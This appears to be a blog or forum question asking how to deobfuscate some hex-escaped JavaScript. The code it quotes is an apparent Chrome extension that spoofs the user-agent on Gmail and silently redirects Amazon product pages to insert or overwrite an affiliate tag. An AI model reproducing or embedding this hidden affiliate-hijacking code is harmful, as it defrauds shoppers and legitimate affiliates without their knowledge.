How can I deobfuscate this javascript?
I have the following code and I am trying to deobfuscate it to readable
javascript. I tried jsbeautifier but it doesn't work. I found a lot of
links to various deobfuscators, but either they don't work or they are
only for Linux. So how do I deobfuscate this code so it is readable
javascript?
var
_0xc819=["\x72\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72\x73","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x6E\x61\x6D\x65","\x75\x73\x65\x72\x2D\x61\x67\x65\x6E\x74","\x76\x61\x6C\x75\x65","\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x38\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x30\x29","\x66\x6F\x72\x45\x61\x63\x68","\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x61\x69\x6C\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2F\x2A","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6D\x61\x69\x6C\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2F\x2A","\x6D\x61\x69\x6E\x5F\x66\x72\x61\x6D\x65","\x73\x75\x62\x5F\x66\x72\x61\x6D\x65","\x62\x6C\x6F\x63\x6B\x69\x6E\x67","\x61\x64\x64\x4C\x69\x73\x74\x65\x6E\x65\x72","\x6F\x6E\x42\x65\x66\x6F\x72\x65\x53\x65\x6E\x64\x48\x65\x61\x64\x65\x72\x73","\x77\x65\x62\x52\x65\x71\x75\x65\x73\x74"];chrome[_0xc819[14]][_0xc819[13]][_0xc819[12]](function
(_0xb56fx1){var
_0xb56fx2=_0xb56fx1[_0xc819[0]];_0xb56fx2[_0xc819[6]](function
(_0xb56fx3,_0xb56fx4){if(_0xb56fx3[_0xc819[2]][_0xc819[1]]()==_0xc819[3]){_0xb56fx3[_0xc819[4]]=_0xc819[5];}
;} );return {requestHeaders:_0xb56fx2};}
,{urls:[_0xc819[7],_0xc819[8]],types:[_0xc819[9],_0xc819[10]]},[_0xc819[11],_0xc819[0]]);
chrome.webRequest.onBeforeRequest.addListener( function(info) { var url =
info.url; var mt = "\x70\x72\x6F\x64\x75\x74\x69\x64\x2D\x32\x30"; var te
= '\x74\x61\x67\x3D'; var site =
"\x61\x6D\x61\x7A\x6F\x6E\x2E\x63\x6F\x6D"; if(url ==
'http://www.'+site+'/') { return; } if(url == 'https://www.'+site+'/') {
return; } if(
url.indexOf("\x2F\x67\x70\x2F\x63\x61\x72\x74\x2F\x76\x69\x65\x77\x2E\x68\x74\x6D\x6C")
> 0 ) { return; } if( ! ( url.indexOf("\x2F\x64\x70\x2F") > 0 ||
url.indexOf("\x2F\x67\x70\x2F") > 0 ||
url.indexOf("\x2F\x72\x65\x67\x69\x73\x74\x72\x79\x2F") > 0 ) ) { return;
} var regExp = /([\&\?]?\x74\x61\x67\x3D)[^\&]+/gi; var c =
url.match(regExp); if( c && c.length ) { } if( c && c.length == 1 ) { if(
url.indexOf(mt) >= 0 ) { return; } url = url.replace(regExp, '$1'+mt);
return {redirectUrl: url }; } else if( c && c.length > 1 ) { url =
url.replace(regExp, ''); } if( url.indexOf(mt) < 0 ) { var extra = ''; if(
url.indexOf('&') >= 0 ) { url = url.replace('&','&'+te+mt+'&'); } else if(
url.indexOf('?') >= 0 ) { url = url.replace('?','?'+te+mt+'&'); } else {
url += '?'+te+mt; } return {redirectUrl: url }; } return; }, { urls: [
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x6D\x61\x7A\x6F\x6E\x2E\x63\x6F\x6D\x2F\x2A",
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x6D\x61\x7A\x6F\x6E\x2E\x63\x6F\x6D\x2F\x2A",
], types: ["main_frame"] }, ["blocking"]);
No comments:
Post a Comment